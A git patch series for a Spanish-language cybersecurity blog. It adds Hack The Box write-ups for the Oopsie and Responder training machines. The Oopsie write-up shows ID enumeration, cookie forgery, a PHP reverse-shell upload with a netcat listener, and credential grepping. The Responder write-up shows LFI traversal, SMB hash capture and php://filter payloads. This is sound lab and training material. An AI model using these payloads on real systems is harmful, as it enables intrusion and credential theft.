From 16854785b043cb0c1013f07cf10fb96a15b59495 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:20:47 +0200
Subject: [PATCH 0001/1701] Update _config.yml
---
_config.yml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/_config.yml b/_config.yml
index c5cf3fdc785..3b29c3fe84d 100644
--- a/_config.yml
+++ b/_config.yml
@@ -1,5 +1,5 @@
-title: Hacker theme
+title: F1r0x
description: Hacker is a theme for GitHub Pages.
show_downloads: true
google_analytics:
-theme: jekyll-theme-hacker
\ No newline at end of file
+theme: jekyll-theme-hacker
From e38bb30361e4bc6ec1cf4201505c1b9c084a6b30 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:27:50 +0200
Subject: [PATCH 0002/1701] Update _config.yml
---
_config.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_config.yml b/_config.yml
index 3b29c3fe84d..b60e65a7834 100644
--- a/_config.yml
+++ b/_config.yml
@@ -1,5 +1,5 @@
title: F1r0x
-description: Hacker is a theme for GitHub Pages.
+description: Blog sobre Ciberseguridad.
show_downloads: true
google_analytics:
theme: jekyll-theme-hacker
From c528b378b274a3d469544cd5886cc103afb93b79 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:31:45 +0200
Subject: [PATCH 0003/1701] Update index.md
---
index.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/index.md b/index.md
index e039c9ac641..1b0f23b1cff 100644
--- a/index.md
+++ b/index.md
@@ -1,3 +1,6 @@
+[HTB-Oopsie](./another-page2.html).
+
+
---
layout: default
---
From 4441d7c6fc0bbedb8a0c44fe4d2839e04d59f05e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:33:39 +0200
Subject: [PATCH 0004/1701] Create another-page2.md
---
another-page2.md | 9 +++++++++
1 file changed, 9 insertions(+)
create mode 100644 another-page2.md
diff --git a/another-page2.md b/another-page2.md
new file mode 100644
index 00000000000..e3b500761f6
--- /dev/null
+++ b/another-page2.md
@@ -0,0 +1,9 @@
+---
+layout: default
+---
+
+## Welcome to another page 2
+
+_yay_
+
+[back](./)
From a77f61a5f58ed5a289d19417684105b1a9b67176 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:40:17 +0200
Subject: [PATCH 0005/1701] Update another-page2.md
---
another-page2.md | 513 ++++++++++++++++++++++++++++++++++++++++++++++-
1 file changed, 507 insertions(+), 6 deletions(-)
diff --git a/another-page2.md b/another-page2.md
index e3b500761f6..f08ec0026af 100644
--- a/another-page2.md
+++ b/another-page2.md
@@ -1,9 +1,510 @@
----
-layout: default
----
+# HTB-Oopsie
-## Welcome to another page 2
+
-_yay_
+
+
+En primer lugar, vamos a comprobar si tenemos conexión
+ con la máquina. Y si podemos averiguar el sistema
+ operativo que utiliza mediante el ttl.
+
+ ping [Ip Víctima]
+
+
+
+ Podemos observar que tiene un ttl=63, por tanto, ya
+ sabemos que estamos frente a una máquina Linux.
+
+ Ahora podemos escanear los puertos mediante nmap.
+
+ nmap -p- --open -T5 -n -v [Ip Víctima] -oG allPorts
+
+
+
+ Esto nos guardará los puertos abiertos en el archivo
+ 'allPorts' por si posteriormente queremos revisarlos
+ de manera rápida accediendo al archivo guardado en
+ nuestro directorio mediante la herramienta 'extractPorts'.
+
+ Puedes encontrar la descripción y la herramienta extractPorts
+ creada por S4vitar en mi repositorio: https://github.com/F1r0x/ExtractPorts
+
+ Es este caso podemos observar los siguientes puertos
+ abiertos por el protocolo TCP:
+
+
+ 
+
+ PORT STATE SERVICE
+
+ 22/tcp open ssh
+
+ 80/tcp open http
+
+
+ Ahora pasaremos a realizar un escaneo más exhaustivo:
+
+ nmap -sC -sV -v -p22,80 [Ip Víctima] -oN target
+
+ 
+
+
+ -sC : Lanza scrips básicos de reconocimiento.
+
+ -sV : Localiza la versión y servicio de los puertos
+ definidos.
+
+ -p : Puertos a escanear. Ej: -p22,80
+
+ -oN : Reporta los resultados en formato nmap al archivo
+ targed.
+
+ Este escaneo, al igual que el anterior, nos guardará los
+ resultados en nuestro directorio en el archivo 'target'.
+
+ 
+
+ Como podemos observar, obtenemos la siguiente información:
+
+ -Puerto 22 corre un servicio ssh con la versión
+ OpenSSH 7.6p1.
+
+ -Puerto 80 corre un servicio http operativo con la versión Apache httpd 2.4.29.
+
+ Nos dirigimos al buscador y trataremos de introducir la Ip como host para ver si nos redirige hacia alguna
+ página web.
+
+ Efectivamente, la dirección http://[Ip Víctima] nos muestra una página web sobre vehículos eléctricos.
+
+
+
+ Bueno, tras investigar un poco la página podemos ver como ningúna de las pestañas esta activa, tambien podemos
+ ver en la parte inferior de la página, en un apartado llamado Services, nos indica que porfavor nos registremos
+ para tener acceso al servicio.
+
+
+
+ Por lo que podemos suponer que tiene que existir alguna página de registro por la que poder acceder.
+ Visto esto vamos a echar un vistazo al codigo fuente de la página para ver si encontramos algúna dirección
+ de registro.
+
+ Para ver el código fuente de una página, click derecho sobre la página y luego 'Ver código fuente de la página'.
+
+ 
+
+ En la parte final del ćodigo podemos ver como muestra un directorio login. Vamos a tratar de acceder a el mediante
+ el buscador para ver que nos reporta.
+
+ 
+
+ Ahora tenemos un sitio desde el que acceder. Ya que desconocemos el usuario y la contraseña (yo he probado los
+ más comunes y no he tenido suerte) vamos ha acceder como invitados. Para ello le daremos a la opción Login as
+ Gues y tendremos acceso como invitados.
+
+ 
+
+Podemos ver que tenemos diferentes pestañas, vamos a revisarlas una por una para ver la información que nos
+aportan:
+
+# Account
+
+
+
+Dentro de account tenemos información sobre el usuario guest, un Access Id, su nombre y un correo eléctronico.
+Luego he revisado el código fuente pero en este caso no me ha reportado mucha información.
+
+Tambien es interesante ver la url de la página, ya que nos asigna una id=2.
+
+
+
+Tras inspeccionar las cookies es donde encontramos algo interesante.
+
+
+
+Podemos ver como está página utiliza cookies de inicio de sesión, en caso de tener otro role y otro user, podriamos
+intentar cambiarlos y ganar acceso a otra cuenta.
+
+Bien ahora pasaremos a la siguiente pestaña a ver que más nos puede reportar.
+
+# Branding
+
+
+
+Aquí podemos ver como se nos asigna una Brand Id = 2 y tambien podemos ver como las cookies de inicio de sesión
+se mantienen.
+
+# Clients
+
+
+
+ Vemos como se nos continiua asignando una ID = 2 y nos muestra un nombre 'client'.
+
+# Uploads
+
+
+
+Esta pestaña es muy interesante ya que parece que sirve para subir archivos a la página. El único problema
+es que no tenemos permisos de 'super admin'.
+
+En caso de tenerlos podriamos subir algún archivo para tratar de vulnerar la máquina o de escalar privilegios.
+
+# Recopilación de toda la información:
+
+Tras investigar por todas las pestañas, lo más interesante que he econtrado es que todos los id de el usuario
+actual son iguales a 2.
+
+Tambien me llama la atención como en la url de la pestaña nos especifica la id=2
+
+ 
+
+Y otra cosa importante, son las cookies de inicio de sesión que emos encontrado.
+
+Ahora, tras conocer toda esta información, lo que podemos hacer es porbar otras 'id' en la url de la pestaña
+'Account'. Simplemente introducimos la misma url pero probamos con otros valores (0,1,3,4,...).
+
+
+
+El primer intento a sido con 0 y vemos como no a tenido resultado.
+
+
+
+Al segundo intento mediante el número id=1 vemos como nos reporta información de un usuario llamado 'admin'. Pero
+nosotros buscamos al usuario 'super admin', ya que es el que tiene pleno acceso a la carga de archviso de la
+pestaña Upload, así que seguimos probando.
+
+
+
+Vemos como tras muchos intentos vacios, nos muestra algunos usuarios.
+
+ 
+
+Finalmente, tras 30 intentos, lo conseguimos. El id=30 pertenece al usuario 'super admin'.
+
+
+
+# Cookies de inicio de sesion:
+
+Ya conoces el Acces ID (86575) y el Name (super admin), ahora tenemos que iniciar sesión como ese usuario.
+Tras probar ha iniciar sesión desda la págin anterior de registro a la que accedimos como 'Gues', veo que
+no me permite entrar, ya que aun desconocemos la contraseña.
+
+Entonces utilizaremos las cookies de inicio de sesión para intentar acceder como super admin. Para ello, en la
+misma pestaña de Account, pulsamos clic derecho sobre la página y pulsamos 'Inspeccionar', dentro nos desplazaremos
+hasta la pestaña 'Almacenamiento'.
+
+
+
+Dentro de 'Almacenamiento' veremos una petaña llamada 'Cookies' y el dominio de la página. Bueno pues el truco
+consiste en cambiar los parametros 'role' y 'user' actuales por los del super admin.
+
+
+
+Una vez introducimos los nuevos datos, recaramos la página y ya tendríamos acceso como super admin.
+Para comprobarlo, nos vamos a la pestaña Uploads y vemos como ya nos permite subir archivos.
+
+
+
+# NetCat y Reverse-Shell
+
+Bueno ahora que ya podemos subir archivos al sistema, vamos a probar a crear una reverse-shell.php ya que la
+url utiliza archivos '.php'.
+
+
+
+########################### php-reverse-shell.php ################################
+
+En caso de utilizar Kali Linux o Parrot, lo más seguro es que ya tengais una reverse-shell en vuestros repositorios.
+En mi caso que utilizo parrot, si realizamos una busqueda del archivo 'php-reverse-shell.php' podemos ver como se
+aloja en los siguientes directorios:
+
+
+
+En mi caso me aparece en dos repositorios y luego yo he realizado una copia en la carpeta Descargas para poder
+configurar con nuestros datos nuestra reverse-shell. Es importante copiar el archivo en la carpeta Descargas
+ya que será dificil buscar nuestro archvivo desde la página de Uploads a la hora de subirlo.
+
+En caso de no tener el archivo php-reverse-shelll.php en vuestro sitema, lo podeis encontrar en mi repositorio
+de github mediante el siguiente enlace: https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php
+
+Para tenerlo, simplemente lo copiais, abris una terminal y crearemos el archivo mediante nano:
+
+ nano php-reverse-shell.php
+
+Pegamos todo el script, guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+# Configurar nuestra reverse-shell:
+
+Ya tendriamos la reverse-shell, ahora solo faltaría configurarla. Para ello, desde el directorio en el que este
+el archivo php-reverse-shell.php (recomiendo que sea Descargas), meidante el comando nano cambiaremos la Ip por
+la nuestra y estableceremos un puerto, desde el cual, posteriormente con NetCat nos pondremos en escucha.
+
+La configuración es muy simple, lo único que tenemos que hacer es cambiar la Ip
+por la de nuestro sistema y establecer el puerto por el que queremos ponernos
+en escucha.
+
+Abrimos una terminar y modificamos el archivo php-reverse-shell.php
+
+ sudo nano php-reverse-shell.php
+
+
+
+
+Establecemos nuestra Ip (tun0) y el puerto de escucha (en este ejemplo usaremos el 8080). Para saber
+cuál es nuestra Ip, podemos verlo mediante el comando 'ipconfig':
+
+ sudo ifconfig
+
+
+
+
+
+Guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+Ya tendriamos nuestro archivo php-reverse-shell.php preparado. Ahora lo siguiente seria tratar de subirlo a la
+página desde la pestaña Uploads.
+
+(NOTA: La Ip de la máquina que yo os muestro a lo largo del write-up va cambiando debido a que realizarlo
+a llevado horas y he tenido que reiniciar varias veces la máquina)
+
+
+
+Para ello simplemente vamos a la página, pulsamos examinar:
+
+
+
+Seleccionamos nuestra reverse-shell:
+
+
+Y finalmente pulsamos Upload:
+
+
+
+Perfecto, ya tendríamos nuestro archivo subido.
+
+
+
+ Ahora faltaría preparar nuestro NetCat para que se pongo en modo escucha por el puerto 8080.
+ Antes de probar el 8080 probe otros con el cual no conseguí establecer conexión para que
+ lo tengaís en cuenta.
+
+ Para ponernos en escucha, abrimos una terminal y ejecutamos el siguiente comando:
+
+ nc -lnvp 8080
+
+ -l : Sirve para que Netcat abra un puerto y se mantenga ala escucha. Se aceptará una única conexión de un
+ único cliente antes de cerrarse.
+
+ -n : Direcciones IP solo numéricas, sin DNS.
+
+ -v : Se usa para mostrar información acerca de la conexión.
+
+ -p : Esta opción permite especificar el puerto al que conectarse.
+
+
+
+El siguiente paso sería ejecutar el archivo php-reverse-shell.php que hemos almacenado en la
+máquina víctima. El unico problema es que no sabemos donde se ha almacenado nuestro archivo.
+Para encontrar nuesto archvi utilizaremos la herramienta 'gobuester'.
+
+# Gobuster
+
+Gobuster es una herramienta utilizada para la fuerza bruta de busqueda de URL, incluidos directorios y archivos,
+así como subdominios DNS.
+
+Para instalarlo simplemente ejecutamos:
+
+ sudo apt install gobuster
+
+ Y tambien tendremos que descargar los repositorios de direcciones, en esta ocasion utilizaremos un
+ repositorio llamado 'wordlists' y en concreto la lista de directorios 'directory-list-2.3-small.txt.
+
+ Podeis descargaros estas bibliotecas de directorios desde la misma página de github, existen un monton
+ de variantes en función del sistema a explotar. De todas formas revisar primero si ya existe en
+ vuestro sistema ya que algunos SO traen repositoios instalados.
+
+ Para descargar o copiar:
+
+ https://gist.github.com/sl4v/c087e36164e74233514b
+
+ En ese enlace encontrareis la biblioteca que vamos a utilizar, yo recomoento instalarlo en el siguiente
+ directorio, si el directorio no existe crarlo.:
+
+ /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
+
+
+ Bien, ya tenemos nuesto Gobuster y nuestra biblioteca de directorios, ahora toca lanzar la herramienta a ver
+ que nos reporta:
+
+ gobuster dir --url http://[Ip Víctima]/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
+
+ Ahora gobuster empezará a realizar pruebas y a mostrarnos resultados a medida q avanza. No tenemos que esperar a
+ que finalice, simplemente fijaros en cuales son los directorios que reporta y ir probando a ver cuales son
+ funcionales.
+
+ 
+
+ Para para el proceso: Cntrl + c
+
+ En esta caso hemos tenido suerte ya que al poco de buscar a encontrado una ruta que nos dirige al directorio
+ Uploads.
+
+ http://[Ip Víctima]/uploads/
+
+ Una vez echo esto nos dirigiremos al navegador y tratremos de introducir la siguiente ruta:
+
+ http://[Ip Víctima]/uploads/php-reverse-shell.php
+
+ 
+
+ Una vez echo esto volvemos a la terminal donde se encontraba el 'netcat' y deberia de haberse abierto
+ nuestra shell.
+
+
+
+ Efectivamente, ya tenemos nuestra reverse-shell preparada y activa.
+
+ # Busqueda de la primera Flag:
+
+ Una vez tengamos la shell activa, podemos ver los directorios mediante ls:
+
+ 
+
+ Vamos a ver que Usuarios tenemos registrados en el sistema, para ello nos dirigimos al directorio /home y vemos
+ q existe el usuario 'robert'.
+
+ 
+
+ Y bingo!! dentro del directorio 'robert' podemos ver el archivo 'user.txt' que contiene la primera Flag.
+
+ 
+
+ Mediante el comando cat podemos ver en la terminal el contenido del archivo:
+
+ cat user.txt
+
+ 
+
+Ahora para poder trabajar de manera más comoda y tratar de escalar privilegios, primero, abriremos una shell
+más funcional. Para ello volvemos al directorio principal mediante cd y ejecutamos el siguiente comando:
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+
+
+
+
+Bien, ahora ya tenemos una shell más segura y funcional. Ya hemos visto que con el usuario actual no podemos
+hacer mucho más ya que tenemos el acceso restringido al sistema.
+
+Ya que el sitio web utiliza PHP y SQL, podemos tratar de comprobar el directorio web en busca de posibles
+divulgaciones o configuraciones incorrectas.
+
+Para ello revisamos los directorios situados en '/var/www/html/'. Tras revisar los distintos directorios, podemos
+ver uno con el nombre 'login' (/var/www/html/cdn-cgi/login) que contiene distintos archivos.
+
+
+
+Aparecen tres archivos '.php' y uno '.js', el siguiente paso seria buscar información en el codigo fuente de cada
+archivo. Para ello, buscaremos cadenas interesantes con el uso de la herramienta 'grep'.
+
+Grep es una herramienta que busca patrones en cada archivo e imprime las líneas que coinciden con los patrones.
+Junto a esta herramienta podemos utilizar el comnado 'cat' para leer todos los arhcivos filtrados por 'grep'.
+
+Con grep utilizaremos el patrón 'passw' para tratar de roportar todas los resultados con ese inicio de palabra (como
+passwd o password por ejemplo). Tambien utilizaremos -i para ignorar las palabras sensibles a mayúsculas y minúsculas
+como por ejemplo las contraseñas en este caso.
+
+ cat * | grep -i passw*
+
+
+ 
+
+ Genial, podemos ver como nos reporta un username = "admin" y una password = "MEGACORP_4dm1n!!".
+
+ Para poder verificar los usuarios disponibles en el sistema, podemos leer el archivo /etc/passwd y tratar
+ de reutilizar la contrasña encontrada en alguna cuenta con altros privilegios.
+
+ cat /etc/passwd
+
+ 
+
+Podemos ver como tenemos un usuario llamado 'robert'. Vamos a tratar de entrar como este usuario mediante el
+comadno 'su' y con la contraseña previamente encontrada.
+
+ su robert
+
+
+
+
+Podemos ver que la contraseña no corresponde con este usuario. Como no nos sirve está contraseña vamos a seguir
+revisando los archivos ".php" y ".js" de manera manual en busca de algo más.
+
+Tras revisar los cuatro archivos, vemos que en el archivo 'db.php' encontramos la siguiente información:
+
+ cat db.php
+
+
+
+Como podeis ver aparecen cuatro palabras que podemos probar como contraseñas, tras probarlas vemos como la
+contraseña del usuario 'robert' es "M3g4C0rpUs3r!"
+
+ su robert
+
+
+
+Finalmente estamos como el usuario 'robert', podemos comprobarlo utilizando el comando 'whoami':
+
+
+
+Ahora podemos ir al directorio pricipal /home/robert y veremos como ahi está nuestro archivo user.txt con
+nuestra primera flag que ya habiamos visto anteriormente sin necesidad de ningún privilegio.
+
+ cd /home/robert
+
+ cat user.txt
+
+
+
+Pero nosotros lo que buscamos es la flag del super usuario y para ello debemos de escalar privilegios.
+
+# Escalada de Privilegios.
+
+En primer luegar trataremos de iniciar sesion como super usuario mediante 'sudo':
+
+ sudo su robert
+
+
+
+Tras probar las contraseñas previamente rocopiladas vemos como ningúna parece funcionar. Vamos a seguir buscando
+información, está vez, vamos a revisar los grupos en los que forma parte el usuario 'robert', para ello
+utilizaremos el comando 'id':
+
+
+
+Vemos como el usurio robert es parte del grupo 'bugtracker'. Ahora, intentemos ver si hay algún
+binario dentro de ese grupo:
+
+ find / -group bugtracker 2>/dev/null
+
+
+
+Nos ha reportado un archivo llamado 'bugtracker'. Ahora comprobamos qué privilegio y qué tipo de archivo es:
+
+ ls -la /usr/bin/bugtracker && file /usr/bin/bugtracker
+
+
+
+Podemos ver que existe un conjunto 'SUID' en ese binario, este es un buen camino de eplotación para tratar de
+escalar privilegios.
+
+Un archivo SUID simepre se ejecuta como el usuario propietario del archivo, independientemente de que usuaio
+pase el comando.
+
+En nuestro caso, el 'butracker' binario es pro piedad de 'root' y por tanto podemos ejecutalo como root ya
+que tiene configurado SUID.
+
+Para ello ejecutamos 'bugtacker':
+
+ /usr/bin/bugtracker
-[back](./)
From e915af8022a123a4910e9907efefd3b82fda6537 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:48:45 +0200
Subject: [PATCH 0006/1701] Update index.md
---
index.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 1b0f23b1cff..213c75bdc4b 100644
--- a/index.md
+++ b/index.md
@@ -1,5 +1,6 @@
-[HTB-Oopsie](./another-page2.html).
+[HTB-Oopsie](./another-page2.html)
+[HTB-Responder](./HTB-Responder.html)
---
layout: default
From 955704c19ace04b5b23da0f6ad3b88fafd5c5e9e Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:51:32 +0200
Subject: [PATCH 0007/1701] Create HTB-Responder.md
---
HTB-Responder.md | 326 +++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 326 insertions(+)
create mode 100644 HTB-Responder.md
diff --git a/HTB-Responder.md b/HTB-Responder.md
new file mode 100644
index 00000000000..4233a355bb6
--- /dev/null
+++ b/HTB-Responder.md
@@ -0,0 +1,326 @@
+
+
+
+# HTB-RESPONDER
+Resolución de la starting_point de HTB Responder.
+
+En primer lugar debemos asegurar que estamos conectados
+a la víctima y tratar de recopilar la máxima información
+posible.
+
+# PING
+
+ Para verificar la conexión y tener una primera toma de
+ contacto utilizaremos el comando 'ping'.
+
+ ping [Ip Víctima]
+
+ Mediante este comando podemos obterner la siguiente
+ información:
+
+ - Verificar la conexión.
+ - La latencia. Podemos observar el tiempo de recorrido
+ de un paquete.
+ - Podemos optener la Ip de un dominio.
+ - Determinar si estamos frente a un SO Linux o Windows:
+ Windows ttl = 128
+ Linux ttl = 64
+
+
+
+Como podemos ver tenemos conexión ya que nos devuelve los
+paquetes enviados y tambien podemos determinar que estamos
+frente a una máquina Windows, ya que nos muestra un ttl=127.
+
+# NMAP
+
+Tras conocer la máquina a la que nos enfrentamos
+pasaremos analizar los protocolos tcp/udp.
+
+Primero analizaremos lo puertos tcp ya que son los más
+utilizados y los más rápidos de escanear.
+
+Mediante nmap realizaremos varios escaneos, el primero
+será un analisis de todos los puertos abiertos del
+protocolo tcp.
+
+
+
+ nmap -p- --open -T5 -v -n [Ip Víctima] -oG allPorts
+
+ -p- : Escanea todo el rango de puertos.
+
+ --open : Solo nos mostrará puertos con el estatus abierto.
+
+ -T5 : Controla el tiempo y el rendimiento del escaneo donde 1 es el más
+ lento y 5 el más rápido.
+
+ -v : Verbose. Recopila los puertos abiertos por TCP y los reporta por
+ consola.
+
+ -n : Anula la resolución DNS.
+
+ -oG : Nos exporta los resultados en formato grepeable.
+
+ allPorts : Es el archivo donde se guardan los resultados.
+
+ Gracias a la función 'extractPorts' podremos acceder en cualquier momento
+ a los resultados guardados en el archivo 'allPorts' y poder copiar y pegar
+ de forma ráìda sin tener que volver a realizar el escaneo.
+
+ Podreís encontrar la función 'extractPorts' en mi repositorio.
+
+ Realizamos el escaneo con nmap:
+
+
+
+Podemos ver como nos muestra tres puertos abiertos. Tras conocer los puertos
+TCP abiertos, realizaremos un segundo escaneo enfocado solo en los puertos
+abiertos para verla información que nos reportan y exportarlo en formato
+nmap al archivo 'targed'.
+
+ 
+
+ nmap -sC -sV -p[Port1,Port2] [Ip Víctima] -oN target
+
+ -sC : Lanza scrips básicos de reconocimiento.
+
+ -sV : Localiza la versión y servicio de los puertos definidos.
+
+ -p : Puertos a escanear. Ej: -p80,5985,7680
+
+ -oN : Reporta los resultados en formato nmap al archivo 'target'.
+
+
+
+Ya tenemos un poco más de información, podemos ver como el puerto 80 tiene un servicio http.
+Vamos a tratar de comprobar en el navegador si podemos acceder algún dominio mediante la ip
+de la máquina.
+
+Para ello nos dirigiremos al navegador (en mi caso firefox) y al tratarse de un sevicio http
+introduciremos la siguiente url:
+
+ http://[Ip Víctima]
+
+
+
+
+
+
+
+Como podemos ver, la dirección no nos carga, pero al fijarnos en la url vemos que nos redirige
+a una página llamada 'unika.htb'. Tener en cuenta que firefox al no poder cargar la página en
+http automáticamente cambia a https para tambien tratar de cargar. Por eso que en firefox al tratar
+de cargar la página finalmente nos muestra https pero la página a la que tenemos que acceder es:
+
+ http://unika.htb
+
+Al igual que en máquinas anteriores, vamos a tratar de introducir los datos del dominio en nuestra
+carpeta de hosts para ver si podemos cargar la paǵina.
+
+Para ello nos dirigiremos al directorio '/etc/hosts' y introduciremos la Ip de la vítima y el host
+al que corresponde:
+
+ sudo nano /etc/hosts
+
+ 
+
+Introducimos al final del archivola ip y el nombre del host (unika.htb) separados por un espacio.
+
+
+
+Guardamos: Cntrl + o
+
+Salimos: Cntrl + x
+
+Una vez terminado esto, regresamos a nuestro navegador y tratamos de recargar la página http://unika.htb.
+
+
+
+Genial, ya tenemos acceso a la página. Como podemos ver, se trata de una empresa de diseño y estetica web.
+Ahora vamos a tratar de revisar la página para buscar algo que nos pueda servir.
+
+Despues de estar un rato revisando la página veo que la unica pestaña que parece hacer algo es la EN, que
+nos ofrece poder cambiar de idioma.
+
+
+
+Al cambiar al frances (FR) o al alemán (DE), algo interesante es que
+la página cambia de url y nos redirige a una página html (más vulnerable).
+
+
+
+Los sitios web dinámicos incluyen páginas HTML sobre la marcha utilizando información de la solicitud
+HTTP para incluir parámetros GET y POST, cookies y otras variables. Es común que una página 'incluya'
+otra página en función de algunos de estos parámetros.
+
+Para tratar de acceder al sistema, vamos a utilizar una tecnica conocida como Local Fail Intrusion LFI.
+
+# Local Fail Intrusion
+
+Un local fail intrusion (inclusión de archivos locales) ocurre cuando un atacante puede hacer que un sitio
+web incluya un archivo que posteriormente utilizará en su beneficio.
+
+Si la aplicación trata esta entrada como confiable y no se realizan las comprobaciones de seguridad requeridas
+en esta entrada, entonces el atacante puede explotarla usando la cadena ../ en el nombre de la página ingresada
+y eventualmente ver los archivos confidenciales en el sistema de archivos local.
+
+La cadena ../ se usa para recorrer un directorio hacia atras, uno a la vez. Por lo tanto, se
+incluyen varias cadenas ../ en la URL para que el controlador de archivos en el servidor vuelva
+al directorio base, es decir, C:.
+
+Luego, cargaremos un archivo remoto en el host proporcionandole un nombre comun en windows para que
+el sistema no pueda detectarlo como malicioso.
+
+Uno de los archivos más comunes a los que un probador de penetración podría intentar acceder en una
+máquina con Windows para verificar LFI es el archivo de 'hosts'.
+
+ WINDOWS/System32/drivers/etc/hosts
+
+(Este archivo ayuda en la traducción local de nombres de host a direcciones IP).
+
+En nuestro caso vemos que al cambiar de idioma al frances (FR) se nos muestra una 'page=' en la
+url. Aquí es donde mediante la cadena ../ retrocederemos hasta el directorio inicial y luego
+nos dirigiremos al archivo 'hosts'. Para ello introduciremos las siguientes ordenes en la url.
+
+ http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
+
+
+
+Como se puede ver, el Local File Inclusion es posible ya que podemos ver el contenido del archivo 'host' en
+situado en el directorio C:/windows/system32/drivers/etc/hosts
+
+
+
+Esto es posible porque en el backend se usa el método 'include()' de PHP para añadir las URL de las página web
+de otros idiomas. Y debido a que no se realiza una desinfección adecuada en este parámetro, pudimos pasar
+entradas maliciosas y ver los archivos internos del sistema.
+
+# Include()
+
+El metodo 'include() en php, toma todo el texto/código/marcado que existe en el archivo especificado y lo carga
+en la memoria, haciéndolo disponible para su uso.
+
+Sabemos que esta página web es vulnerable a la vulnerabilidad de inclusión de archivos y se sirve
+en un máquina de ventanas. Por lo tanto, existe la posibilidad de incluir un archivo en la estación
+de trabajo de nuestro atacante.
+
+Podemos utilizar un protocolo como SMB para que Windows intente autenticarse en nuestra máquina y
+poder capturar el NetNTLMv2.
+
+# NTLM
+
+NTLM es una colección de protocolos de autenticación creados por Microsoft.
+
+El proceso de autenticación NTLM se realiza de la siguiente manera:
+
+ 1. El cliente envía el nombre de usuario y el nombre de dominio al servidor.
+
+ 2. El servidor genera una cadena de caracteres aleatorios, denominada desafío y la devuelve al cliente.
+
+ 3. El cliente cifra el desafío con el hash NTLM de la contraseña del usuario y lo envía de vuelta al servidor.
+
+ 4. El servidor recupera la contraseña de usuario (o equivalente).
+
+ 5. El servidor utiliza el valor hash recuperado de la base de datos de la cuenta de seguridad
+ para cifrar la cadena de desafío. Luego, el valor se compara con el valor recibido del cliente.
+ Si los valores coinciden, el cliente se autentica.
+
+ En el archivo de configuración 'php.ini' de la maquina, si 'allow_url_include' está configurado en 'Desactivado'
+ de forma predeterminada indica que PHP no carga URL HTTP o FTP remotas para evitar ataques de inclusión
+ de archivos remotos.
+
+ Sin embargo, incluso si allow_url_include y allow_url_fopen están configurados en 'Off', PHP no impedirá
+ la carga de URL de SMB.
+
+ En nuestro caso, podemos hacer un mal uso de esta funcionalidad para robar el hash NTLM.
+
+ Ahora, podemos intentar cargar una URL de SMB y capturar los valores hash del objetivo mediante 'Responder'.
+
+ # Herramienta Responder
+
+ Responder es una herramienta que puede realizar muchos tipos diferentes de ataques, pero para este escenario,
+ configurará un servidor SMB malicioso.
+
+ Cuando la máquina de destino intenta realizar la autenticación NTLM en ese servidor, Responder devuelve un
+ desafío para que el servidor cifre con la contraseña del usuario.
+
+ Cuando el servidor responde, Responder utilizará el desafío y la respuesta cifrada para generar el NetNTLMv2.
+
+ Si bien no podemos revertir NetNTLMv2, podemos probar muchas contraseñas comunes diferentes para ver si
+ alguna genera la misma respuesta de desafío y, si encontramos una, sabemos que esa es la contraseña.
+
+ Esto a menudo se conoce como descifrado de hash, lo que haremos con un programa llamado John The Ripper.
+
+ Primero nos clonaremos el repositorio de la herramienta Responder del siguiente repositorio:
+
+ sudo git clone https://github.com/SpiderLabs/Responder
+
+
+
+ Recordar que el repositorio 'Responder' se clonara el directorio en el que nos encontremos.
+ Ahora podemos ver como dentro del directorio 'Responder' se han clonado los siguientes
+ archivos:
+
+ 
+
+ Ahora vamosa a comprobar que en archivo 'Responder.conf' tenemos configurados los parametros de escucha
+ SQL y SMB en On. Para ver el archivo podemos utilizar el comando 'cat' y para modificarlo el comando 'nano'.
+
+ nano Responder.conf
+
+ 
+
+ En caso de estar en modo off lo cambiamos al on, guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+ Ya tendriamos la herramienta Responder preparada. Ahora debemos iniciar Responder con python3
+ y utilizar el indicado -I para activar el modo escucha.
+
+ sudo python3 Responder.py -I tun0
+
+
+
+
+
+ Una vez tenemos el Responder listo y en escucha, debemos configurar un parámetro dentro del servidor de la
+ máquina para que incluya un recurso de nuestro servidor SMB.
+
+ Este parámetro lo configuraremos mediante el navegador web. Para ello incluiremos nuestra ip (tun0) lo cual
+ podemos ver mediante el comando 'ifconfig'.
+
+ http://unika.htb/?page=//[Ip de nuestra tun0]/somefile
+
+
+
+Tras intentar realizar la escucha varias veces y recargar la página no consdigo establecer la conexión.
+He revisado varias veces la configuración y por algún motivo Responder no me funciona.
+
+# File Local Inlcusion PHP
+
+Así que tras ver que con Responder no podía, empece a buscar vulnerabilidades comunes de File Local Intrusion
+y tras mucho investigar encontre una intrusión conocida como wrapper php//filter.
+
+Donde básicamente mediante el buscador, incluimos una dirección que nos reporta el hash en base64.
+Tras probar las distintas obciones, está fue la que me funciono a mi:
+
+ page=php://filter/convert.base64-encode/resource=index.php
+
+Aqui podeís encontrar más información y más vulnerabilidades de Local File Intrusion PHP:
+https://book.hacktricks.xyz/pentesting-web/file-inclusion
+
+
+
+Lo introduciomos en el buscador:
+
+
+
+ http://unika.htb/index.php?page=php://filter/convert.base64-encode/resource=index.php
+
